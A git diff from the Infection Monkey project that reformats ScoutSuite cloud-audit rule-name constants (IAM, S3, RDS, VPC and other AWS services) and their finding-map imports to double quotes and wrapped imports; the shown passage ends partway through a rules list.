monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class ELBRules(RuleNameEnum): # Logging - ELB_NO_ACCESS_LOGS = 'elb-no-access-logs' + ELB_NO_ACCESS_LOGS = "elb-no-access-logs" # Encryption - ELB_LISTENER_ALLOWING_CLEARTEXT = 'elb-listener-allowing-cleartext' - ELB_OLDER_SSL_POLICY = 'elb-older-ssl-policy' + ELB_LISTENER_ALLOWING_CLEARTEXT = "elb-listener-allowing-cleartext" + ELB_OLDER_SSL_POLICY = "elb-older-ssl-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py index f7a264cf3..90590a651 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/elbv2_rules.py @@ -1,16 +1,18 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class ELBv2Rules(RuleNameEnum): # Encryption - ELBV2_LISTENER_ALLOWING_CLEARTEXT = 'elbv2-listener-allowing-cleartext' - ELBV2_OLDER_SSL_POLICY = 'elbv2-older-ssl-policy' + ELBV2_LISTENER_ALLOWING_CLEARTEXT = "elbv2-listener-allowing-cleartext" + ELBV2_OLDER_SSL_POLICY = "elbv2-older-ssl-policy" # Logging - ELBV2_NO_ACCESS_LOGS = 'elbv2-no-access-logs' + ELBV2_NO_ACCESS_LOGS = "elbv2-no-access-logs" # Data loss prevention - ELBV2_NO_DELETION_PROTECTION = 'elbv2-no-deletion-protection' + ELBV2_NO_DELETION_PROTECTION = "elbv2-no-deletion-protection" # Service security - ELBV2_HTTP_REQUEST_SMUGGLING = 'elbv2-http-request-smuggling' + ELBV2_HTTP_REQUEST_SMUGGLING = "elbv2-http-request-smuggling" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py index fef58e066..8589446bb 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/iam_rules.py @@ -1,39 +1,41 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class IAMRules(RuleNameEnum): # Authentication/authorization - IAM_USER_NO_ACTIVE_KEY_ROTATION = 'iam-user-no-Active-key-rotation' - IAM_PASSWORD_POLICY_MINIMUM_LENGTH = 'iam-password-policy-minimum-length' - IAM_PASSWORD_POLICY_NO_EXPIRATION = 'iam-password-policy-no-expiration' - IAM_PASSWORD_POLICY_REUSE_ENABLED = 'iam-password-policy-reuse-enabled' - IAM_USER_WITH_PASSWORD_AND_KEY = 'iam-user-with-password-and-key' - IAM_ASSUME_ROLE_LACKS_EXTERNAL_ID_AND_MFA = 'iam-assume-role-lacks-external-id-and-mfa' - IAM_USER_WITHOUT_MFA = 'iam-user-without-mfa' - IAM_ROOT_ACCOUNT_NO_MFA = 'iam-root-account-no-mfa' - IAM_ROOT_ACCOUNT_WITH_ACTIVE_KEYS = 'iam-root-account-with-active-keys' - IAM_USER_NO_INACTIVE_KEY_ROTATION = 'iam-user-no-Inactive-key-rotation' - IAM_USER_WITH_MULTIPLE_ACCESS_KEYS = 'iam-user-with-multiple-access-keys' + IAM_USER_NO_ACTIVE_KEY_ROTATION = "iam-user-no-Active-key-rotation" + IAM_PASSWORD_POLICY_MINIMUM_LENGTH = "iam-password-policy-minimum-length" + IAM_PASSWORD_POLICY_NO_EXPIRATION = "iam-password-policy-no-expiration" + IAM_PASSWORD_POLICY_REUSE_ENABLED = "iam-password-policy-reuse-enabled" + IAM_USER_WITH_PASSWORD_AND_KEY = "iam-user-with-password-and-key" + IAM_ASSUME_ROLE_LACKS_EXTERNAL_ID_AND_MFA = "iam-assume-role-lacks-external-id-and-mfa" + IAM_USER_WITHOUT_MFA = "iam-user-without-mfa" + IAM_ROOT_ACCOUNT_NO_MFA = "iam-root-account-no-mfa" + IAM_ROOT_ACCOUNT_WITH_ACTIVE_KEYS = "iam-root-account-with-active-keys" + IAM_USER_NO_INACTIVE_KEY_ROTATION = "iam-user-no-Inactive-key-rotation" + IAM_USER_WITH_MULTIPLE_ACCESS_KEYS = "iam-user-with-multiple-access-keys" # Least privilege - IAM_ASSUME_ROLE_POLICY_ALLOWS_ALL = 'iam-assume-role-policy-allows-all' - IAM_EC2_ROLE_WITHOUT_INSTANCES = 'iam-ec2-role-without-instances' - IAM_GROUP_WITH_INLINE_POLICIES = 'iam-group-with-inline-policies' - IAM_GROUP_WITH_NO_USERS = 'iam-group-with-no-users' - IAM_INLINE_GROUP_POLICY_ALLOWS_IAM_PASSROLE = 'iam-inline-group-policy-allows-iam-PassRole' - IAM_INLINE_GROUP_POLICY_ALLOWS_NOTACTIONS = 'iam-inline-group-policy-allows-NotActions' - IAM_INLINE_GROUP_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-inline-group-policy-allows-sts-AssumeRole' - IAM_INLINE_ROLE_POLICY_ALLOWS_IAM_PASSROLE = 'iam-inline-role-policy-allows-iam-PassRole' - IAM_INLINE_ROLE_POLICY_ALLOWS_NOTACTIONS = 'iam-inline-role-policy-allows-NotActions' - IAM_INLINE_ROLE_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-inline-role-policy-allows-sts-AssumeRole' - IAM_INLINE_USER_POLICY_ALLOWS_IAM_PASSROLE = 'iam-inline-user-policy-allows-iam-PassRole' - IAM_INLINE_USER_POLICY_ALLOWS_NOTACTIONS = 'iam-inline-user-policy-allows-NotActions' - IAM_INLINE_USER_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-inline-user-policy-allows-sts-AssumeRole' - IAM_MANAGED_POLICY_ALLOWS_IAM_PASSROLE = 'iam-managed-policy-allows-iam-PassRole' - IAM_MANAGED_POLICY_ALLOWS_NOTACTIONS = 'iam-managed-policy-allows-NotActions' - IAM_MANAGED_POLICY_ALLOWS_STS_ASSUMEROLE = 'iam-managed-policy-allows-sts-AssumeRole' - IAM_MANAGED_POLICY_NO_ATTACHMENTS = 'iam-managed-policy-no-attachments' - IAM_ROLE_WITH_INLINE_POLICIES = 'iam-role-with-inline-policies' - IAM_ROOT_ACCOUNT_USED_RECENTLY = 'iam-root-account-used-recently' - IAM_ROOT_ACCOUNT_WITH_ACTIVE_CERTS = 'iam-root-account-with-active-certs' - IAM_USER_WITH_INLINE_POLICIES = 'iam-user-with-inline-policies' + IAM_ASSUME_ROLE_POLICY_ALLOWS_ALL = "iam-assume-role-policy-allows-all" + IAM_EC2_ROLE_WITHOUT_INSTANCES = "iam-ec2-role-without-instances" + IAM_GROUP_WITH_INLINE_POLICIES = "iam-group-with-inline-policies" + IAM_GROUP_WITH_NO_USERS = "iam-group-with-no-users" + IAM_INLINE_GROUP_POLICY_ALLOWS_IAM_PASSROLE = "iam-inline-group-policy-allows-iam-PassRole" + IAM_INLINE_GROUP_POLICY_ALLOWS_NOTACTIONS = "iam-inline-group-policy-allows-NotActions" + IAM_INLINE_GROUP_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-inline-group-policy-allows-sts-AssumeRole" + IAM_INLINE_ROLE_POLICY_ALLOWS_IAM_PASSROLE = "iam-inline-role-policy-allows-iam-PassRole" + IAM_INLINE_ROLE_POLICY_ALLOWS_NOTACTIONS = "iam-inline-role-policy-allows-NotActions" + IAM_INLINE_ROLE_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-inline-role-policy-allows-sts-AssumeRole" + IAM_INLINE_USER_POLICY_ALLOWS_IAM_PASSROLE = "iam-inline-user-policy-allows-iam-PassRole" + IAM_INLINE_USER_POLICY_ALLOWS_NOTACTIONS = "iam-inline-user-policy-allows-NotActions" + IAM_INLINE_USER_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-inline-user-policy-allows-sts-AssumeRole" + IAM_MANAGED_POLICY_ALLOWS_IAM_PASSROLE = "iam-managed-policy-allows-iam-PassRole" + IAM_MANAGED_POLICY_ALLOWS_NOTACTIONS = "iam-managed-policy-allows-NotActions" + IAM_MANAGED_POLICY_ALLOWS_STS_ASSUMEROLE = "iam-managed-policy-allows-sts-AssumeRole" + IAM_MANAGED_POLICY_NO_ATTACHMENTS = "iam-managed-policy-no-attachments" + IAM_ROLE_WITH_INLINE_POLICIES = "iam-role-with-inline-policies" + IAM_ROOT_ACCOUNT_USED_RECENTLY = "iam-root-account-used-recently" + IAM_ROOT_ACCOUNT_WITH_ACTIVE_CERTS = "iam-root-account-with-active-certs" + IAM_USER_WITH_INLINE_POLICIES = "iam-user-with-inline-policies" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py index b303c8573..db8e2602b 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/rds_rules.py @@ -1,19 +1,21 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class RDSRules(RuleNameEnum): # Encryption - RDS_INSTANCE_STORAGE_NOT_ENCRYPTED = 'rds-instance-storage-not-encrypted' + RDS_INSTANCE_STORAGE_NOT_ENCRYPTED = "rds-instance-storage-not-encrypted" # Data loss prevention - RDS_INSTANCE_BACKUP_DISABLED = 'rds-instance-backup-disabled' - RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD = 'rds-instance-short-backup-retention-period' - RDS_INSTANCE_SINGLE_AZ = 'rds-instance-single-az' + RDS_INSTANCE_BACKUP_DISABLED = "rds-instance-backup-disabled" + RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD = "rds-instance-short-backup-retention-period" + RDS_INSTANCE_SINGLE_AZ = "rds-instance-single-az" # Firewalls - RDS_SECURITY_GROUP_ALLOWS_ALL = 'rds-security-group-allows-all' - RDS_SNAPSHOT_PUBLIC = 'rds-snapshot-public' + RDS_SECURITY_GROUP_ALLOWS_ALL = "rds-security-group-allows-all" + RDS_SNAPSHOT_PUBLIC = "rds-snapshot-public" # Service security - RDS_INSTANCE_CA_CERTIFICATE_DEPRECATED = 'rds-instance-ca-certificate-deprecated' - RDS_INSTANCE_NO_MINOR_UPGRADE = 'rds-instance-no-minor-upgrade' + RDS_INSTANCE_CA_CERTIFICATE_DEPRECATED = "rds-instance-ca-certificate-deprecated" + RDS_INSTANCE_NO_MINOR_UPGRADE = "rds-instance-no-minor-upgrade" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py index 2538cf54d..20fa6337d 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/redshift_rules.py @@ -1,19 +1,21 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class RedshiftRules(RuleNameEnum): # Encryption - REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED = 'redshift-cluster-database-not-encrypted' - REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED = 'redshift-parameter-group-ssl-not-required' + REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED = "redshift-cluster-database-not-encrypted" + REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED = "redshift-parameter-group-ssl-not-required" # Firewalls - REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL = 'redshift-security-group-whitelists-all' + REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL = "redshift-security-group-whitelists-all" # Restrictive Policies - REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE = 'redshift-cluster-publicly-accessible' + REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE = "redshift-cluster-publicly-accessible" # Logging - REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED = 'redshift-parameter-group-logging-disabled' + REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED = "redshift-parameter-group-logging-disabled" # Service security - REDSHIFT_CLUSTER_NO_VERSION_UPGRADE = 'redshift-cluster-no-version-upgrade' + REDSHIFT_CLUSTER_NO_VERSION_UPGRADE = "redshift-cluster-no-version-upgrade" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py index 4ba27a57a..a57d95f7c 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/s3_rules.py @@ -1,29 +1,31 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class S3Rules(RuleNameEnum): # Encryption - S3_BUCKET_ALLOWING_CLEARTEXT = 's3-bucket-allowing-cleartext' - S3_BUCKET_NO_DEFAULT_ENCRYPTION = 's3-bucket-no-default-encryption' + S3_BUCKET_ALLOWING_CLEARTEXT = "s3-bucket-allowing-cleartext" + S3_BUCKET_NO_DEFAULT_ENCRYPTION = "s3-bucket-no-default-encryption" # Data loss prevention - S3_BUCKET_NO_MFA_DELETE = 's3-bucket-no-mfa-delete' - S3_BUCKET_NO_VERSIONING = 's3-bucket-no-versioning' + S3_BUCKET_NO_MFA_DELETE = "s3-bucket-no-mfa-delete" + S3_BUCKET_NO_VERSIONING = "s3-bucket-no-versioning" # Logging - S3_BUCKET_NO_LOGGING = 's3-bucket-no-logging' + S3_BUCKET_NO_LOGGING = "s3-bucket-no-logging" # Permissive access rules - S3_BUCKET_AUTHENTICATEDUSERS_WRITE_ACP = 's3-bucket-AuthenticatedUsers-write_acp' - S3_BUCKET_AUTHENTICATEDUSERS_WRITE = 's3-bucket-AuthenticatedUsers-write' - S3_BUCKET_AUTHENTICATEDUSERS_READ_ACP = 's3-bucket-AuthenticatedUsers-read_acp' - S3_BUCKET_AUTHENTICATEDUSERS_READ = 's3-bucket-AuthenticatedUsers-read' - S3_BUCKET_ALLUSERS_WRITE_ACP = 's3-bucket-AllUsers-write_acp' - S3_BUCKET_ALLUSERS_WRITE = 's3-bucket-AllUsers-write' - S3_BUCKET_ALLUSERS_READ_ACP = 's3-bucket-AllUsers-read_acp' - S3_BUCKET_ALLUSERS_READ = 's3-bucket-AllUsers-read' - S3_BUCKET_WORLD_PUT_POLICY = 's3-bucket-world-Put-policy' - S3_BUCKET_WORLD_POLICY_STAR = 's3-bucket-world-policy-star' - S3_BUCKET_WORLD_LIST_POLICY = 's3-bucket-world-List-policy' - S3_BUCKET_WORLD_GET_POLICY = 's3-bucket-world-Get-policy' - S3_BUCKET_WORLD_DELETE_POLICY = 's3-bucket-world-Delete-policy' + S3_BUCKET_AUTHENTICATEDUSERS_WRITE_ACP = "s3-bucket-AuthenticatedUsers-write_acp" + S3_BUCKET_AUTHENTICATEDUSERS_WRITE = "s3-bucket-AuthenticatedUsers-write" + S3_BUCKET_AUTHENTICATEDUSERS_READ_ACP = "s3-bucket-AuthenticatedUsers-read_acp" + S3_BUCKET_AUTHENTICATEDUSERS_READ = "s3-bucket-AuthenticatedUsers-read" + S3_BUCKET_ALLUSERS_WRITE_ACP = "s3-bucket-AllUsers-write_acp" + S3_BUCKET_ALLUSERS_WRITE = "s3-bucket-AllUsers-write" + S3_BUCKET_ALLUSERS_READ_ACP = "s3-bucket-AllUsers-read_acp" + S3_BUCKET_ALLUSERS_READ = "s3-bucket-AllUsers-read" + S3_BUCKET_WORLD_PUT_POLICY = "s3-bucket-world-Put-policy" + S3_BUCKET_WORLD_POLICY_STAR = "s3-bucket-world-policy-star" + S3_BUCKET_WORLD_LIST_POLICY = "s3-bucket-world-List-policy" + S3_BUCKET_WORLD_GET_POLICY = "s3-bucket-world-Get-policy" + S3_BUCKET_WORLD_DELETE_POLICY = "s3-bucket-world-Delete-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py index 4cb875c6d..d1894144d 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/ses_rules.py @@ -1,8 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class SESRules(RuleNameEnum): # Permissive policies - SES_IDENTITY_WORLD_SENDRAWEMAIL_POLICY = 'ses-identity-world-SendRawEmail-policy' - SES_IDENTITY_WORLD_SENDEMAIL_POLICY = 'ses-identity-world-SendEmail-policy' + SES_IDENTITY_WORLD_SENDRAWEMAIL_POLICY = "ses-identity-world-SendRawEmail-policy" + SES_IDENTITY_WORLD_SENDEMAIL_POLICY = "ses-identity-world-SendEmail-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py index 9fb847114..47e49a0d1 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sns_rules.py @@ -1,13 +1,15 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class SNSRules(RuleNameEnum): # Permissive policies - SNS_TOPIC_WORLD_SUBSCRIBE_POLICY = 'sns-topic-world-Subscribe-policy' - SNS_TOPIC_WORLD_SETTOPICATTRIBUTES_POLICY = 'sns-topic-world-SetTopicAttributes-policy' - SNS_TOPIC_WORLD_REMOVEPERMISSION_POLICY = 'sns-topic-world-RemovePermission-policy' - SNS_TOPIC_WORLD_RECEIVE_POLICY = 'sns-topic-world-Receive-policy' - SNS_TOPIC_WORLD_PUBLISH_POLICY = 'sns-topic-world-Publish-policy' - SNS_TOPIC_WORLD_DELETETOPIC_POLICY = 'sns-topic-world-DeleteTopic-policy' - SNS_TOPIC_WORLD_ADDPERMISSION_POLICY = 'sns-topic-world-AddPermission-policy' + SNS_TOPIC_WORLD_SUBSCRIBE_POLICY = "sns-topic-world-Subscribe-policy" + SNS_TOPIC_WORLD_SETTOPICATTRIBUTES_POLICY = "sns-topic-world-SetTopicAttributes-policy" + SNS_TOPIC_WORLD_REMOVEPERMISSION_POLICY = "sns-topic-world-RemovePermission-policy" + SNS_TOPIC_WORLD_RECEIVE_POLICY = "sns-topic-world-Receive-policy" + SNS_TOPIC_WORLD_PUBLISH_POLICY = "sns-topic-world-Publish-policy" + SNS_TOPIC_WORLD_DELETETOPIC_POLICY = "sns-topic-world-DeleteTopic-policy" + SNS_TOPIC_WORLD_ADDPERMISSION_POLICY = "sns-topic-world-AddPermission-policy" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py index cc5c774e3..84190ceb3 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/sqs_rules.py @@ -1,13 +1,17 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class SQSRules(RuleNameEnum): # Permissive policies - SQS_QUEUE_WORLD_SENDMESSAGE_POLICY = 'sqs-queue-world-SendMessage-policy' - SQS_QUEUE_WORLD_RECEIVEMESSAGE_POLICY = 'sqs-queue-world-ReceiveMessage-policy' - SQS_QUEUE_WORLD_PURGEQUEUE_POLICY = 'sqs-queue-world-PurgeQueue-policy' - SQS_QUEUE_WORLD_GETQUEUEURL_POLICY = 'sqs-queue-world-GetQueueUrl-policy' - SQS_QUEUE_WORLD_GETQUEUEATTRIBUTES_POLICY = 'sqs-queue-world-GetQueueAttributes-policy' - SQS_QUEUE_WORLD_DELETEMESSAGE_POLICY = 'sqs-queue-world-DeleteMessage-policy' - SQS_QUEUE_WORLD_CHANGEMESSAGEVISIBILITY_POLICY = 'sqs-queue-world-ChangeMessageVisibility-policy' + SQS_QUEUE_WORLD_SENDMESSAGE_POLICY = "sqs-queue-world-SendMessage-policy" + SQS_QUEUE_WORLD_RECEIVEMESSAGE_POLICY = "sqs-queue-world-ReceiveMessage-policy" + SQS_QUEUE_WORLD_PURGEQUEUE_POLICY = "sqs-queue-world-PurgeQueue-policy" + SQS_QUEUE_WORLD_GETQUEUEURL_POLICY = "sqs-queue-world-GetQueueUrl-policy" + SQS_QUEUE_WORLD_GETQUEUEATTRIBUTES_POLICY = "sqs-queue-world-GetQueueAttributes-policy" + SQS_QUEUE_WORLD_DELETEMESSAGE_POLICY = "sqs-queue-world-DeleteMessage-policy" + SQS_QUEUE_WORLD_CHANGEMESSAGEVISIBILITY_POLICY = ( + "sqs-queue-world-ChangeMessageVisibility-policy" + ) diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py index 4dcbd4f1a..f4ecba532 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/rule_names/vpc_rules.py @@ -1,15 +1,17 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) class VPCRules(RuleNameEnum): # Logging - SUBNET_WITHOUT_FLOW_LOG = 'vpc-subnet-without-flow-log' + SUBNET_WITHOUT_FLOW_LOG = "vpc-subnet-without-flow-log" # Firewalls - SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS = 'vpc-subnet-with-allow-all-ingress-acls' - SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS = 'vpc-subnet-with-allow-all-egress-acls' - NETWORK_ACL_NOT_USED = 'vpc-network-acl-not-used' - DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS = 'vpc-default-network-acls-allow-all-ingress' - DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS = 'vpc-default-network-acls-allow-all-egress' - CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS = 'vpc-custom-network-acls-allow-all-ingress' - CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS = 'vpc-custom-network-acls-allow-all-egress' + SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS = "vpc-subnet-with-allow-all-ingress-acls" + SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS = "vpc-subnet-with-allow-all-egress-acls" + NETWORK_ACL_NOT_USED = "vpc-network-acl-not-used" + DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS = "vpc-default-network-acls-allow-all-ingress" + DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS = "vpc-default-network-acls-allow-all-egress" + CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS = "vpc-custom-network-acls-allow-all-ingress" + CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS = "vpc-custom-network-acls-allow-all-egress" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py index 251e57324..ddab1cfd6 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_finding_maps.py @@ -2,17 +2,29 @@ from abc import ABC, abstractmethod from typing import List from common.common_consts import zero_trust_consts -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import CloudformationRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import CloudTrailRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import CloudWatchRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ConfigRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import ( + CloudformationRules, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import ( + CloudTrailRules, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import ( + CloudWatchRules, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ( + ConfigRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ec2_rules import EC2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elb_rules import ELBRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elbv2_rules import ELBv2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.iam_rules import IAMRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rds_rules import RDSRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import RedshiftRules -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import ( + RedshiftRules, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.s3_rules import S3Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ses_rules import SESRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sns_rules import SNSRules @@ -34,47 +46,68 @@ class ScoutSuiteFindingMap(ABC): class PermissiveFirewallRules(ScoutSuiteFindingMap): - rules = [EC2Rules.SECURITY_GROUP_ALL_PORTS_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL, - EC2Rules.SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL, EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF, - EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS, EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP, - EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET, EC2Rules.SECURITY_GROUP_OPENS_PORT_RANGE, - EC2Rules.EC2_SECURITY_GROUP_WHITELISTS_AWS, - VPCRules.SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS, - VPCRules.SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS, - VPCRules.NETWORK_ACL_NOT_USED, - VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS, - VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS, - VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS, - VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS, - RDSRules.RDS_SECURITY_GROUP_ALLOWS_ALL, - RedshiftRules.REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL - ] + rules = [ + EC2Rules.SECURITY_GROUP_ALL_PORTS_TO_ALL, + 